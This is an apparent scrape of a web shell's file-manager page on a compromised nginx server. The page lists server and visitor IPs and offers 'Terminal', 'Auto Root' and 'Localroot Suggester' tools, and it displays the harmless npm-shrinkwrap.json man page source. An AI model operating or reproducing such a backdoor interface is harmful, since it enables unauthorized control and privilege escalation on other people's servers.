Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.142
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
node_modules /
npm /
man /
man5 /
Delete
Unzip
Name
Size
Permission
Date
Action
folders.5
8.25
KB
-rw-r--r--
2022-01-10 12:20
install.5
3.13
KB
-rw-r--r--
2022-01-10 12:20
npmrc.5
3
KB
-rw-r--r--
2022-01-10 12:20
package-json.5
28.98
KB
-rw-r--r--
2022-01-10 12:20
package-lock-json.5
5.99
KB
-rw-r--r--
2022-01-10 12:20
package-locks.5
6.84
KB
-rw-r--r--
2022-01-10 12:20
shrinkwrap-json.5
1.24
KB
-rw-r--r--
2022-01-10 12:20
Save
Rename
.TH "NPM\-SHRINKWRAP\.JSON" "5" "August 2021" "" "" .SH "NAME" \fBnpm-shrinkwrap.json\fR \- A publishable lockfile .SS Description .P \fBnpm\-shrinkwrap\.json\fP is a file created by npm help \fBshrinkwrap\fP\|\. It is identical to \fBpackage\-lock\.json\fP, with one major caveat: Unlike \fBpackage\-lock\.json\fP, \fBnpm\-shrinkwrap\.json\fP may be included when publishing a package\. .P The recommended use\-case for \fBnpm\-shrinkwrap\.json\fP is applications deployed through the publishing process on the registry: for example, daemons and command\-line tools intended as global installs or \fBdevDependencies\fP\|\. It's strongly discouraged for library authors to publish this file, since that would prevent end users from having control over transitive dependency updates\. .P Additionally, if both \fBpackage\-lock\.json\fP and \fBnpm\-shrinkwrap\.json\fP are present in a package root, \fBpackage\-lock\.json\fP will be ignored in favor of this file\. .P For full details and description of the \fBnpm\-shrinkwrap\.json\fP file format, refer to the manual page for npm help package\-lock\.json\. .SS See also .RS 0 .IP \(bu 2 npm help shrinkwrap .IP \(bu 2 npm help package\-lock\.json .IP \(bu 2 npm help package\.json .IP \(bu 2 npm help install .RE